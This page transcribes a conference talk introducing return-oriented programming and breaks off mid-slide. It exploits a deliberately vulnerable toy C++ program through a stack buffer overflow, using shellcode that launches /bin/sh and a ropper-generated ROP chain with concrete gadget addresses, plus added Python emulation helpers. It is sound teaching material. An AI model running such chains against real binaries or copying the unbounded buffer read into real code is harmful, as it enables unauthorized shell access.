lorraineandreiamcidl
 
Webinar On-Demand: Using Flutter for Embedded
Webinar On-Demand: Using Flutter for EmbeddedWebinar On-Demand: Using Flutter for Embedded
Webinar On-Demand: Using Flutter for Embedded
ICS
 
Graspan: A Big Data System for Big Code Analysis
Graspan: A Big Data System for Big Code AnalysisGraspan: A Big Data System for Big Code Analysis
Graspan: A Big Data System for Big Code Analysis
Aftab Hussain
 
Revolutionizing Visual Effects Mastering AI Face Swaps.pdf
Revolutionizing Visual Effects Mastering AI Face Swaps.pdfRevolutionizing Visual Effects Mastering AI Face Swaps.pdf
Revolutionizing Visual Effects Mastering AI Face Swaps.pdf
Undress Baby
 
How to write a program in any programming language
How to write a program in any programming languageHow to write a program in any programming language
How to write a program in any programming language
Rakesh Kumar R
 
2024 eCommerceDays Toulouse - Sylius 2.0.pdf
2024 eCommerceDays Toulouse - Sylius 2.0.pdf2024 eCommerceDays Toulouse - Sylius 2.0.pdf
2024 eCommerceDays Toulouse - Sylius 2.0.pdf
Łukasz Chruściel
 
Transform Your Communication with Cloud-Based IVR Solutions
Transform Your Communication with Cloud-Based IVR SolutionsTransform Your Communication with Cloud-Based IVR Solutions
Transform Your Communication with Cloud-Based IVR Solutions
TheSMSPoint
 
openEuler Case Study - The Journey to Supply Chain Security
openEuler Case Study - The Journey to Supply Chain SecurityopenEuler Case Study - The Journey to Supply Chain Security
openEuler Case Study - The Journey to Supply Chain Security
Shane Coughlan
 
Using Query Store in Azure PostgreSQL to Understand Query Performance
Using Query Store in Azure PostgreSQL to Understand Query PerformanceUsing Query Store in Azure PostgreSQL to Understand Query Performance
Using Query Store in Azure PostgreSQL to Understand Query Performance
Grant Fritchey
 
Why Choose Odoo 17 Community & How it differs from Odoo 17 Enterprise Edition
Why Choose Odoo 17 Community & How it differs from Odoo 17 Enterprise EditionWhy Choose Odoo 17 Community & How it differs from Odoo 17 Enterprise Edition
Why Choose Odoo 17 Community & How it differs from Odoo 17 Enterprise Edition
Envertis Software Solutions
 
原版定制美国纽约州立大学奥尔巴尼分校毕业证学位证书原版一模一样
原版定制美国纽约州立大学奥尔巴尼分校毕业证学位证书原版一模一样原版定制美国纽约州立大学奥尔巴尼分校毕业证学位证书原版一模一样
原版定制美国纽约州立大学奥尔巴尼分校毕业证学位证书原版一模一样
mz5nrf0n
 
AI Fusion Buddy Review: Brand New, Groundbreaking Gemini-Powered AI App
AI Fusion Buddy Review: Brand New, Groundbreaking Gemini-Powered AI AppAI Fusion Buddy Review: Brand New, Groundbreaking Gemini-Powered AI App
AI Fusion Buddy Review: Brand New, Groundbreaking Gemini-Powered AI App
Google
 
UI5con 2024 - Keynote: Latest News about UI5 and it’s Ecosystem
UI5con 2024 - Keynote: Latest News about UI5 and it’s EcosystemUI5con 2024 - Keynote: Latest News about UI5 and it’s Ecosystem
UI5con 2024 - Keynote: Latest News about UI5 and it’s Ecosystem
Peter Muessig
 
Neo4j - Product Vision and Knowledge Graphs - GraphSummit Paris
Neo4j - Product Vision and Knowledge Graphs - GraphSummit ParisNeo4j - Product Vision and Knowledge Graphs - GraphSummit Paris
Neo4j - Product Vision and Knowledge Graphs - GraphSummit Paris
Neo4j
 
A Study of Variable-Role-based Feature Enrichment in Neural Models of Code
A Study of Variable-Role-based Feature Enrichment in Neural Models of CodeA Study of Variable-Role-based Feature Enrichment in Neural Models of Code
A Study of Variable-Role-based Feature Enrichment in Neural Models of Code
Aftab Hussain
 
GraphSummit Paris - The art of the possible with Graph Technology
GraphSummit Paris - The art of the possible with Graph TechnologyGraphSummit Paris - The art of the possible with Graph Technology
GraphSummit Paris - The art of the possible with Graph Technology
Neo4j
 

Recently uploaded (20)

OpenMetadata Community Meeting - 5th June 2024
OpenMetadata Community Meeting - 5th June 2024OpenMetadata Community Meeting - 5th June 2024
OpenMetadata Community Meeting - 5th June 2024
 
Fundamentals of Programming and Language Processors
Fundamentals of Programming and Language ProcessorsFundamentals of Programming and Language Processors
Fundamentals of Programming and Language Processors
 
Automated software refactoring with OpenRewrite and Generative AI.pptx.pdf
Automated software refactoring with OpenRewrite and Generative AI.pptx.pdfAutomated software refactoring with OpenRewrite and Generative AI.pptx.pdf
Automated software refactoring with OpenRewrite and Generative AI.pptx.pdf
 
DDS-Security 1.2 - What's New? Stronger security for long-running systems
DDS-Security 1.2 - What's New? Stronger security for long-running systemsDDS-Security 1.2 - What's New? Stronger security for long-running systems
DDS-Security 1.2 - What's New? Stronger security for long-running systems
 
LORRAINE ANDREI_LEQUIGAN_HOW TO USE ZOOM
LORRAINE ANDREI_LEQUIGAN_HOW TO USE ZOOMLORRAINE ANDREI_LEQUIGAN_HOW TO USE ZOOM
LORRAINE ANDREI_LEQUIGAN_HOW TO USE ZOOM
 
Webinar On-Demand: Using Flutter for Embedded
Webinar On-Demand: Using Flutter for EmbeddedWebinar On-Demand: Using Flutter for Embedded
Webinar On-Demand: Using Flutter for Embedded
 
Graspan: A Big Data System for Big Code Analysis
Graspan: A Big Data System for Big Code AnalysisGraspan: A Big Data System for Big Code Analysis
Graspan: A Big Data System for Big Code Analysis
 
Revolutionizing Visual Effects Mastering AI Face Swaps.pdf
Revolutionizing Visual Effects Mastering AI Face Swaps.pdfRevolutionizing Visual Effects Mastering AI Face Swaps.pdf
Revolutionizing Visual Effects Mastering AI Face Swaps.pdf
 
How to write a program in any programming language
How to write a program in any programming languageHow to write a program in any programming language
How to write a program in any programming language
 
2024 eCommerceDays Toulouse - Sylius 2.0.pdf
2024 eCommerceDays Toulouse - Sylius 2.0.pdf2024 eCommerceDays Toulouse - Sylius 2.0.pdf
2024 eCommerceDays Toulouse - Sylius 2.0.pdf
 
Transform Your Communication with Cloud-Based IVR Solutions
Transform Your Communication with Cloud-Based IVR SolutionsTransform Your Communication with Cloud-Based IVR Solutions
Transform Your Communication with Cloud-Based IVR Solutions
 
openEuler Case Study - The Journey to Supply Chain Security
openEuler Case Study - The Journey to Supply Chain SecurityopenEuler Case Study - The Journey to Supply Chain Security
openEuler Case Study - The Journey to Supply Chain Security
 
Using Query Store in Azure PostgreSQL to Understand Query Performance
Using Query Store in Azure PostgreSQL to Understand Query PerformanceUsing Query Store in Azure PostgreSQL to Understand Query Performance
Using Query Store in Azure PostgreSQL to Understand Query Performance
 
Why Choose Odoo 17 Community & How it differs from Odoo 17 Enterprise Edition
Why Choose Odoo 17 Community & How it differs from Odoo 17 Enterprise EditionWhy Choose Odoo 17 Community & How it differs from Odoo 17 Enterprise Edition
Why Choose Odoo 17 Community & How it differs from Odoo 17 Enterprise Edition
 
原版定制美国纽约州立大学奥尔巴尼分校毕业证学位证书原版一模一样
原版定制美国纽约州立大学奥尔巴尼分校毕业证学位证书原版一模一样原版定制美国纽约州立大学奥尔巴尼分校毕业证学位证书原版一模一样
原版定制美国纽约州立大学奥尔巴尼分校毕业证学位证书原版一模一样
 
AI Fusion Buddy Review: Brand New, Groundbreaking Gemini-Powered AI App
AI Fusion Buddy Review: Brand New, Groundbreaking Gemini-Powered AI AppAI Fusion Buddy Review: Brand New, Groundbreaking Gemini-Powered AI App
AI Fusion Buddy Review: Brand New, Groundbreaking Gemini-Powered AI App
 
UI5con 2024 - Keynote: Latest News about UI5 and it’s Ecosystem
UI5con 2024 - Keynote: Latest News about UI5 and it’s EcosystemUI5con 2024 - Keynote: Latest News about UI5 and it’s Ecosystem
UI5con 2024 - Keynote: Latest News about UI5 and it’s Ecosystem
 
Neo4j - Product Vision and Knowledge Graphs - GraphSummit Paris
Neo4j - Product Vision and Knowledge Graphs - GraphSummit ParisNeo4j - Product Vision and Knowledge Graphs - GraphSummit Paris
Neo4j - Product Vision and Knowledge Graphs - GraphSummit Paris
 
A Study of Variable-Role-based Feature Enrichment in Neural Models of Code
A Study of Variable-Role-based Feature Enrichment in Neural Models of CodeA Study of Variable-Role-based Feature Enrichment in Neural Models of Code
A Study of Variable-Role-based Feature Enrichment in Neural Models of Code
 
GraphSummit Paris - The art of the possible with Graph Technology
GraphSummit Paris - The art of the possible with Graph TechnologyGraphSummit Paris - The art of the possible with Graph Technology
GraphSummit Paris - The art of the possible with Graph Technology
 

Return Oriented Programming, an introduction

  • 1. TurtleSec @pati_gallardo. Warning! This presentation has A LOT of assembly. Run while you have the chance.
  • 2. Return Oriented Programming: an introduction. NDC Security 2023, Patricia Aas, TurtleSec.
  • 3. Patricia Aas - Trainer & Consultant. C++ Programmer, Application Security. Currently: TurtleSec. Previously: Vivaldi, Cisco Systems, Knowit, Opera Software. Master in Computer Science. Pronouns: she/they.
  • 5. The application: target.cpp (@olvemaudal)
    #include <cstdio>
    #include <cstring>
    #include <iostream>

    void launch_missiles(int n) {
      printf("Launching %d missiles\n", n);
    }

    void authenticate_and_launch() {
      int n_missiles = 2;
      bool allowaccess = false;
      char response[110];
      printf("Secret: ");
      std::cin >> response;

      if (strcmp(response, "Joshua") == 0)
        allowaccess = true;

      if (allowaccess) {
        puts("Access granted");
        launch_missiles(n_missiles);
      }

      if (!allowaccess)
        puts("Access denied");
    }

    int main() {
      puts("WarGames MissileLauncher v0.1");
      authenticate_and_launch();
      puts("Operation complete");
    }
  • 7. The vulnerability: target.cpp (same listing as slide 5). The stack allocated buffer `char response[110]` is filled by `std::cin >> response` with no length limit: a Stack Buffer Overflow.
  • 9. Our x86 32-bit shellcode for Linux
  • 10. Shellcode: a piece of code, typically in machine code, that is delivered and executed as part of an exploit. Called "shellcode" because a traditional use was to start a shell, for example sh. In real exploits it will deliver some kind of mechanism for further (remote) compromise of the system.
  • 11. Shellcode - code that gives you shell: int execve(const char *filename, char *const argv[], char *const envp[]); The target process starts out running the vulnerable program; after the shellcode runs, the same target process is running /bin/sh.
  • 12. The Plan
    1. Write C code for shellcode
    2. Test C code
    3. Write inline assembly
    4. Test asm code
    5. Create ROP Chain
    6. Test ROP Chain
  • 13. Write C code for shellcode: shellcode.c (close, open, execve)
    #include <fcntl.h>
    #include <unistd.h>

    int main(void) {
      int fd = 0;
      close(fd);
      const char *filename = "/dev/tty";
      int flag = O_RDONLY;
      open(filename, flag);
      const char *name = "/bin/sh";
      char *const *argv = NULL;
      char *const *envp = NULL;
      execve(name, argv, envp);
    }
  • 14. The Plan: Test C code
  • 15. Test C code for shellcode
    $ gcc -Wno-incompatible-pointer-types -m32 -o shellcode shellcode.c
    $ ./shellcode
    $
  • 16. The Plan: Write inline assembly
  • 17. Registers
    32-bit  16-bit  8-bit high  8-bit low
    eax     ax      ah          al
    ebx     bx      bh          bl
    ecx     cx      ch          cl
    edx     dx      dh          dl
    x86 32-bit Linux syscall convention:
    eax  Syscall number
    ebx  1. argument
    ecx  2. argument
    edx  3. argument
  • 18. C code for shellcode: shellcode.c (listing as on slide 13), looking at close
  • 19. close - calling convention
    eax  Syscall number  0x06
    ebx  1. argument     unsigned int fd
    ecx  2. argument     Not in use
    edx  3. argument     Not in use
    int fd = 0;
    close(fd);
  • 20. close asm (eax: Syscall number 0x06, ebx: unsigned int fd)
    "xor eax, eax\n\t"   // Zero out
    "mov eax, 0x06\n\t"  // Set eax to syscall number (0x06)
    "xor ebx, ebx\n\t"   // Zero out ebx - file descriptor
    "int 0x80\n\t"       // Invoke syscall
  • 21. close: instructions and register state
    Syscall registers: eax : Syscall number, ebx : unsigned int fd
    1. xor eax, eax   ->  eax 0x00
    2. mov eax, 0x06  ->  eax 0x06
    3. xor ebx, ebx   ->  ebx 0x00
    4. int 0x80       ->  close
  • 22. C code for shellcode: shellcode.c (listing as on slide 13), looking at open
  • 23. open - calling convention
    eax  Syscall number  0x05
    ebx  1. argument     const char *filename
    ecx  2. argument     int flags
    edx  3. argument     umode_t mode
    const char *filename = "/dev/tty";
    int flag = O_RDONLY;
    open(filename, flag);
  • 24. Stack manipulation: esp (32-bit) / sp (16-bit) is the stack pointer. As instructions like push and pop are executed the stack pointer register (esp) is updated so it points to the "top of the stack".
  • 25. open asm (eax: Syscall number 0x05, ebx: const char *filename, ecx: int flags, edx: umode_t mode)
    "xor eax, eax\n\t"          // Zero out
    "mov eax, 0x05\n\t"         // Set eax to syscall number (0x05)
    "xor ebx, ebx\n\t"          // Zero out
    "push ebx\n\t"              // Push null terminator
    "mov ebx, 0x7974742f\n\t"   // "ytt/"
    "push ebx\n\t"              // Part two of the string
    "mov ebx, 0x7665642f\n\t"   // "ved/"
    "push ebx\n\t"              // Part one of the string
    "mov ebx, esp\n\t"          // Put pointer in ebx
    "xor ecx, ecx\n\t"          // Zero out
    "xor edx, edx\n\t"          // Zero out
    "int 0x80\n\t"              // Invoke syscall
  • 26. open: instructions, register state and stack
    Syscall registers: eax : Syscall number, ebx : const char *filename, ecx : int flags, edx : umode_t mode
    1. xor eax, eax         ->  eax 0x00
    2. mov eax, 0x05        ->  eax 0x05
    3. xor ebx, ebx         ->  ebx 0x00000000
    4. push ebx             ->  stack: 0x00 0x00 0x00 0x00 (null terminator)
    5. mov ebx, 0x7974742f  ->  ebx 0x7974742f
    6. push ebx             ->  stack: 0x2f '/' 0x74 't' 0x74 't' 0x79 'y'
    7. mov ebx, 0x7665642f  ->  ebx 0x7665642f
    8. push ebx             ->  stack: 0x2f '/' 0x64 'd' 0x65 'e' 0x76 'v'
    9. mov ebx, esp         ->  ebx = esp, pointing at "/dev/tty"
    10. xor ecx, ecx        ->  ecx 0x00 (O_RDONLY)
    11. xor edx, edx        ->  edx 0x00
    12. int 0x80            ->  open
    Stack from esp upward: "/dev", "/tty", null
  • 27. C code for shellcode: shellcode.c (listing as on slide 13), looking at execve
  • 28. execve - calling convention
    eax  Syscall number  0x0b
    ebx  1. argument     const char *name
    ecx  2. argument     const char *const *argv
    edx  3. argument     const char *const *envp
    const char *name = "/bin/sh";
    char *const *argv = NULL;
    char *const *envp = NULL;
    execve(name, argv, envp);
  • 29. execve asm (eax: Syscall number 0x0b, ebx: const char *name, ecx: const char *const *argv, edx: const char *const *envp)
    "xor eax, eax\n\t"          // Zero out
    "mov eax, 0x0b\n\t"         // Set eax to syscall number (0x0b)
    "xor ebx, ebx\n\t"          // Zero out
    "push ebx\n\t"              // Push null terminator
    "mov ebx, 0x68732f2f\n\t"   // "hs//"
    "push ebx\n\t"              // Part two of the string
    "mov ebx, 0x6e69622f\n\t"   // "nib/"
    "push ebx\n\t"              // Part one of the string
    "mov ebx, esp\n\t"          // Put pointer in ebx
    "xor ecx, ecx\n\t"          // Zero out
    "xor edx, edx\n\t"          // Zero out
    "int 0x80\n\t"              // Invoke syscall
  • 30. execve: instructions, register state and stack
    Syscall registers: eax : Syscall number, ebx : const char *name, ecx : const char *const *argv, edx : const char *const *envp
    1. xor eax, eax         ->  eax 0x00
    2. mov eax, 0x0b        ->  eax 0x0b
    3. xor ebx, ebx         ->  ebx 0x00000000
    4. push ebx             ->  stack: 0x00 0x00 0x00 0x00 (null terminator)
    5. mov ebx, 0x68732f2f  ->  ebx 0x68732f2f
    6. push ebx             ->  stack: 0x2f '/' 0x2f '/' 0x73 's' 0x68 'h'
    7. mov ebx, 0x6e69622f  ->  ebx 0x6e69622f
    8. push ebx             ->  stack: 0x2f '/' 0x62 'b' 0x69 'i' 0x6e 'n'
    9. mov ebx, esp         ->  ebx = esp, pointing at "/bin//sh"
    10. xor ecx, ecx        ->  ecx 0x00
    11. xor edx, edx        ->  edx 0x00
    12. int 0x80            ->  execve
    Stack from esp upward: "/bin", "//sh", null
  • 31. The Plan: Test asm code
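The immediates that the open and execve asm above move into ebx are the path strings packed little-endian four bytes at a time and pushed last chunk first, with a path that is not a multiple of 4 bytes padded by an extra slash ("/bin/sh" becomes "/bin//sh" on slide 29). The helper below is added for this page, not code from the talk; it computes those immediates, rebuilds the bytes esp ends up pointing at, and flags bytes that collide with the bad-byte list from the ropper invocation later in the talk (00 09 0b 20).

```python
import struct

# Bad bytes taken from the ropper command in the talk: --badbytes 00090b20
BAD_BYTES = bytes.fromhex("00090b20")


def pad_path(path):
    """Pad a path to a multiple of 4 bytes with extra slashes before the last component.

    The kernel treats a run of slashes as one separator, so "/bin/sh" becomes
    "/bin//sh" (as on slide 29) and "/dev/tty" (already 8 bytes) is unchanged.
    """
    head, _, last = path.rpartition("/")
    while (len(head) + 1 + len(last)) % 4:
        head += "/"
    return head + "/" + last


def push_dwords(path):
    """Return (immediate, ascii) pairs in push order for the padded path.

    The stack grows downward, so the last 4 bytes are pushed first and the
    first 4 bytes last; afterwards esp points at the start of the string,
    which is what `mov ebx, esp` relies on.  The terminating null dword is
    pushed from a zeroed register, so it carries no immediate and is omitted.
    """
    padded = pad_path(path).encode()
    chunks = [padded[i:i + 4] for i in range(0, len(padded), 4)]
    return [(struct.unpack("<I", c)[0], c.decode()) for c in reversed(chunks)]


def bad_bytes_in(path):
    """Byte values of the padded path that would land in the bad-byte list."""
    return sorted({b for b in pad_path(path).encode() if b in BAD_BYTES})


def stack_after_pushes(path):
    """Reconstruct memory from esp upward after the null push and the string pushes."""
    words = [imm for imm, _ in push_dwords(path)]
    # The chunk pushed last sits lowest, so reversing push order gives string order.
    return b"".join(struct.pack("<I", w) for w in reversed(words)) + b"\0" * 4
```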
  • 32. shellcode_asm.c (close, open, execve as inline assembly)
    int main(void) {
      __asm__(
        ".intel_syntax noprefix\n\t"
        "xor eax, eax\n\t"          // Zero out
        "mov eax, 0x06\n\t"         // Set eax to syscall number (0x06)
        "xor ebx, ebx\n\t"          // Zero out ebx - file descriptor
        "int 0x80\n\t"              // Invoke syscall
        "xor eax, eax\n\t"          // Zero out
        "mov eax, 0x05\n\t"         // Set eax to syscall number (0x05)
        "xor ebx, ebx\n\t"          // Zero out
        "push ebx\n\t"              // Push null terminator
        "mov ebx, 0x7974742f\n\t"   // "ytt/"
        "push ebx\n\t"              // Part two of the string
        "mov ebx, 0x7665642f\n\t"   // "ved/"
        "push ebx\n\t"              // Part one of the string
        "mov ebx, esp\n\t"          // Put pointer in ebx
        "xor ecx, ecx\n\t"          // Zero out
        "xor edx, edx\n\t"          // Zero out
        "int 0x80\n\t"              // Invoke syscall
        "xor eax, eax\n\t"          // Zero out
        "mov eax, 0x0b\n\t"         // Set eax to syscall number (0x0b)
        "xor ebx, ebx\n\t"          // Zero out
        "push ebx\n\t"              // Push null terminator
        "mov ebx, 0x68732f2f\n\t"   // "hs//"
        "push ebx\n\t"              // Part two of the string
        "mov ebx, 0x6e69622f\n\t"   // "nib/"
        "push ebx\n\t"              // Part one of the string
        "mov ebx, esp\n\t"          // Put pointer in ebx
        "xor ecx, ecx\n\t"          // Zero out
        "xor edx, edx\n\t"          // Zero out
        "int 0x80\n\t"              // Invoke syscall
      );
    }
  • 33. Test asm code for shellcode
    $ clang -m32 -o shellcode_asm shellcode_asm.c
    $ ./shellcode_asm
    $
  • 34. The Plan: Create ROP Chain
  • 36. Foundational idea: the ret instruction transfers execution to the (return) address located on the stack.
  • 37. A ret instruction is being executed
    Stack (top first): <addr 1>, <addr 2>; stack ptr -> <addr 1>
    RX memory at <addr 1>: xor eax, eax; ret;
    1. ret  ->  instruction ptr = <addr 1>, stack ptr -> <addr 2>; the gadget at <addr 1> runs (eax 0x00000000) and its own ret then pops <addr 2>
  • 38. The Stack Buffer Overflow: stack at time of overflow
    Stack allocated buffer:  [0] PADDING, [1] PADDING, [2] PADDING, [3] PADDING
    Return address:          [4] Gadget 1 addr
    Rest of ROP chain:       [5] Gadget 2 addr, [6] Gadget 3 addr, [7] Gadget 4 addr, [8] Gadget 5 addr, [9] Gadget 6 addr
    RX memory: every gadget address points at <instructions>; ret;
  • 39. Put it all into the exploit string: Padding, then the ROP Chain (Gadget 1, Gadget 2, Gadget 3, Gadget 4, Gadget 5).
  • 40. Script: rop_chain.py (print padding followed by the ROP chain)
    #!/usr/bin/env python2
    from struct import pack

    rop = ''
    rop += '\x90'*130  # Use pattern_create/offset

    # TODO : Put in ROP chain here

    print(rop)
  • 41. Using ropper to find gadgets and create a ROP chain (Terminal)
    $ ropper --file target --chain execve --badbytes 00090b20
    [INFO] Load gadgets from cache
    [LOAD] loading... 100%
    [LOAD] filtering badbytes... 100%
    [LOAD] removing double gadgets... 100%
    [INFO] ROPchain Generator for syscall execve:
    [INFO]
    write command into data section
    eax 0xb
    ebx address to cmd
    ecx address to null
    edx address to null
    [INFO] Try to create chain which fills registers without delete content of previous filled registers
    [*] Try permuation 1 / 24
    [INFO] Look for syscall gadget
    [INFO] syscall gadget found
    [INFO] generating rop chain
  • 42. Using ropper to create a ROP chain: the generated script (Terminal)
    #!/usr/bin/env python
    # Generated by ropper ropchain generator #
    from struct import pack

    p = lambda x : pack('I', x)

    IMAGE_BASE_0 = 0x08048000 # 14e751855dc7dea49f8c9c0e10a22363f36ee225cb9bfee3b663fa039ac8a9ea
    rebase_0 = lambda x : p(x + IMAGE_BASE_0)

    rop = ''
    [... ROP CHAIN ...]
    print(rop)
    [INFO] rop chain generated!
  • 43. The ROP Chain (gadgets 1 to 9 are identified in the comments)
    rop += rebase_0(0x000ae1aa) # 0x080f61aa: pop eax; ret;
    rop += '//bi'
    rop += rebase_0(0x000a2c66) # 0x080eac66: pop edx; pop ebx; pop esi; pop edi; pop ebp; ret;
    rop += rebase_0(0x001ca060)
    rop += p(0xdeadbeef)
    rop += p(0xdeadbeef)
    rop += p(0xdeadbeef)
    rop += p(0xdeadbeef)
    rop += rebase_0(0x0001730c) # 0x0805f30c: mov dword ptr [edx], eax; ret;
    rop += rebase_0(0x000ae1aa) # 0x080f61aa: pop eax; ret;
    rop += 'n/sh'
    rop += rebase_0(0x000a2c66) # 0x080eac66: pop edx; pop ebx; pop esi; pop edi; pop ebp; ret;
    rop += rebase_0(0x001ca064)
    rop += p(0xdeadbeef)
    rop += p(0xdeadbeef)
    rop += p(0xdeadbeef)
    rop += p(0xdeadbeef)
    rop += rebase_0(0x0001730c) # 0x0805f30c: mov dword ptr [edx], eax; ret;
    rop += rebase_0(0x0000ddf4) # 0x08055df4: xor eax, eax; ret;
    rop += rebase_0(0x000a2c66) # 0x080eac66: pop edx; pop ebx; pop esi; pop edi; pop ebp; ret;
    rop += rebase_0(0x001ca068)
    rop += p(0xdeadbeef)
    rop += p(0xdeadbeef)
    rop += p(0xdeadbeef)
    rop += p(0xdeadbeef)
    rop += rebase_0(0x0001730c) # 0x0805f30c: mov dword ptr [edx], eax; ret;
    rop += rebase_0(0x0000101e) # 0x0804901e: pop ebx; ret;
    rop += rebase_0(0x001ca060)
    rop += rebase_0(0x00004c88) # 0x0804cc88: pop ecx; ret;
    rop += rebase_0(0x001ca068)
    rop += rebase_0(0x000f9715) # 0x08141715: pop edx; xor eax, eax; pop edi; ret;
    rop += rebase_0(0x001ca068)
    rop += p(0xdeadbeef)
    rop += rebase_0(0x000ae1aa) # 0x080f61aa: pop eax; ret;
    rop += p(0xfffffff5)
    rop += rebase_0(0x000df9d3) # 0x081279d3: neg eax; ret;
    rop += rebase_0(0x00113f80) # 0x0815bf80: int 0x80; ret;
  • 44. ROP chain gadgets
    1. 0x000ae1aa  pop eax; ret;
    2. 0x000a2c66  pop edx; pop ebx; pop esi; pop edi; pop ebp; ret;
    3. 0x0001730c  mov dword ptr [edx], eax; ret;
    4. 0x08055df4  xor eax, eax; ret;
    5. 0x0000101e  pop ebx; ret;
    6. 0x00004c88  pop ecx; ret;
    7. 0x000f9715  pop edx; xor eax, eax; pop edi; ret;
    8. 0x000df9d3  neg eax; ret;
    9. 0x00113f80  int 0x80; ret;
45
Gadgets in RX memory, in instruction pointer order:
0x000ae1aa: pop eax; ret;
0x000a2c66: pop edx; pop ebx; pop esi; pop edi; pop ebp; ret;
0x0001730c: mov dword ptr [edx], eax; ret;
Stack (in pop order): 0x000ae1aa, '//bi', 0x000a2c66, 0x001ca060, 0xdeadbeef, 0xdeadbeef, 0xdeadbeef, 0xdeadbeef, 0x0001730c
Registers after these gadgets: eax = '//bi', edx = 0x001ca060, ebx = esi = edi = ebp = 0xdeadbeef
RW Memory: 0x001ca060 = '//bi', 0x001ca064, 0x001ca068
46
Gadgets in RX memory, in instruction pointer order:
0x000ae1aa: pop eax; ret;
0x000a2c66: pop edx; pop ebx; pop esi; pop edi; pop ebp; ret;
0x0001730c: mov dword ptr [edx], eax; ret;
Stack (in pop order): 0x000ae1aa, 'n/sh', 0x000a2c66, 0x001ca064, 0xdeadbeef, 0xdeadbeef, 0xdeadbeef, 0xdeadbeef, 0x0001730c
Registers after these gadgets: eax = 'n/sh', edx = 0x001ca064, ebx = esi = edi = ebp = 0xdeadbeef
RW Memory: 0x001ca060 = '//bi', 0x001ca064 = 'n/sh', 0x001ca068
47
Gadgets in RX memory, in instruction pointer order:
0x0000ddf4: xor eax, eax; ret;
0x000a2c66: pop edx; pop ebx; pop esi; pop edi; pop ebp; ret;
0x0001730c: mov dword ptr [edx], eax; ret;
Stack (in pop order): 0x0000ddf4, 0x000a2c66, 0x001ca068, 0xdeadbeef, 0xdeadbeef, 0xdeadbeef, 0xdeadbeef, 0x0001730c
Registers after these gadgets: eax = 0x00000000, edx = 0x001ca068, ebx = esi = edi = ebp = 0xdeadbeef
RW Memory: 0x001ca060 = '//bi', 0x001ca064 = 'n/sh', 0x001ca068 = 0x00000000
48
Gadgets in RX memory, in instruction pointer order:
0x0000101e: pop ebx; ret;
0x00004c88: pop ecx; ret;
0x000f9715: pop edx; xor eax, eax; pop edi; ret;
0x000ae1aa: pop eax; ret;
0x000df9d3: neg eax; ret;
Stack (in pop order): 0x0000101e, 0x001ca060, 0x00004c88, 0x001ca068, 0x000f9715, 0x001ca068, 0xdeadbeef, 0x000ae1aa, 0xfffffff5, 0x000df9d3
Registers after these gadgets: eax = 0x00000000 after the xor, 0xfffffff5 after the pop, 0x0b after the neg; ebx = 0x001ca060, ecx = 0x001ca068, edx = 0x001ca068, edi = 0xdeadbeef
RW Memory: 0x001ca060 = '//bi', 0x001ca064 = 'n/sh', 0x001ca068 = 0x00000000
49
Gadget in RX memory:
0x00113f80: int 0x80; ret;
Stack (in pop order): 0x00113f80
Registers at the syscall: eax = 0x0b, ebx = 0x001ca060, ecx = 0x001ca068, edx = 0x001ca068
RW Memory: 0x001ca060 = '//bi', 0x001ca064 = 'n/sh', 0x001ca068 = 0x00000000
Syscall Registers
eax : Syscall number
ebx : const char *name
ecx : const char *const *argv
edx : const char *const *envp
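To see how the stack words on slides 45 to 49 drive the gadgets, here is an added Python emulator (not the talk's rop_chain.py): it models each gadget's side effects from the instruction listings on the slides, replays the stack layout word by word, and lets you check that the registers end in the execve state the slides show (eax = 0x0b, ebx pointing at "//bin/sh", ecx and edx both pointing at the zero word). The gadget semantics and the scratch address 0x001ca060 are taken from the slides, not read from the binary.

```python
# Added example, not the talk's code: emulate the execve chain on slides 45-49.
# Gadget offsets, stack words and the scratch address come from the slides; the
# gadget semantics are modelled here rather than read from the binary.
import struct

BUF = 0x001ca060          # RW scratch address used on the slides
PAD = [0xdeadbeef] * 4    # filler consumed by the pops of ebx/esi/edi/ebp
GADGETS = {               # gadget offset -> what it does before its ret
    0x000ae1aa: [("pop", "eax")],
    0x000a2c66: [("pop", r) for r in ("edx", "ebx", "esi", "edi", "ebp")],
    0x0001730c: [("store",)],                # mov dword ptr [edx], eax
    0x0000ddf4: [("zero_eax",)],             # xor eax, eax
    0x0000101e: [("pop", "ebx")],
    0x00004c88: [("pop", "ecx")],
    0x000f9715: [("pop", "edx"), ("zero_eax",), ("pop", "edi")],
    0x000df9d3: [("neg_eax",)],
    0x00113f80: [("syscall",)],              # int 0x80
}

CHAIN = (
    [0x000ae1aa, b"//bi", 0x000a2c66, BUF] + PAD + [0x0001730c]         # slide 45
    + [0x000ae1aa, b"n/sh", 0x000a2c66, BUF + 4] + PAD + [0x0001730c]   # slide 46
    + [0x0000ddf4, 0x000a2c66, BUF + 8] + PAD + [0x0001730c]            # slide 47
    + [0x0000101e, BUF, 0x00004c88, BUF + 8, 0x000f9715, BUF + 8,       # slide 48
       0xdeadbeef, 0x000ae1aa, 0xfffffff5, 0x000df9d3]
    + [0x00113f80]                                                      # slide 49
)

def run(words):
    """Execute a chain of stack words; each gadget's ret pops the next one."""
    stack = b"".join(w if isinstance(w, bytes) else struct.pack("<I", w) for w in words)
    regs = dict.fromkeys(("eax", "ebx", "ecx", "edx", "esi", "edi", "ebp"), 0)
    mem, calls, sp = {}, [], 0
    pop = lambda sp: (struct.unpack_from("<I", stack, sp)[0], sp + 4)
    while sp < len(stack):
        ip, sp = pop(sp)
        for op, *arg in GADGETS[ip]:
            if op == "pop": regs[arg[0]], sp = pop(sp)
            elif op == "store": mem[regs["edx"]] = regs["eax"]
            elif op == "zero_eax": regs["eax"] = 0
            elif op == "neg_eax": regs["eax"] = -regs["eax"] & 0xFFFFFFFF
            else: calls.append(dict(regs))  # int 0x80: registers the kernel sees
    return regs, mem, calls

def cstring(mem, addr):
    """Read a NUL-terminated string back out of the emulated RW memory."""
    out = b""
    while b"\0" not in (word := struct.pack("<I", mem.get(addr, 0))):
        out, addr = out + word, addr + 4
    return out + word.split(b"\0")[0]
```

Because ecx and edx both point at the zero word at 0x001ca068, argv and envp are each an empty NULL-terminated array, which is why three writes are enough for the whole execve setup.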
51
close gadgets
1. 0x000ae1aa: pop eax; ret;
8. 0x000df9d3: neg eax; ret;
9. 0x00113f80: int 0x80; ret;
Missing: xor ebx, ebx; ret;
Syscall Registers
eax : Syscall number
ebx : unsigned int fd
# 1. Zero out ebx
# TODO

# 2. Put value in eax ( neg 0xfffffffa = 0x06 )
rop += rebase_0(0x000ae1aa) # 0x080f61aa: pop eax; ret;
rop += p(0xfffffffa)

# 3. Negate value in eax
rop += rebase_0(0x000df9d3) # 0x081279d3: neg eax; ret;

# 4. Syscall
rop += rebase_0(0x00113f80) # 0x0815bf80: int 0x80; ret;
52
open gadgets
1. 0x000ae1aa: pop eax; ret;
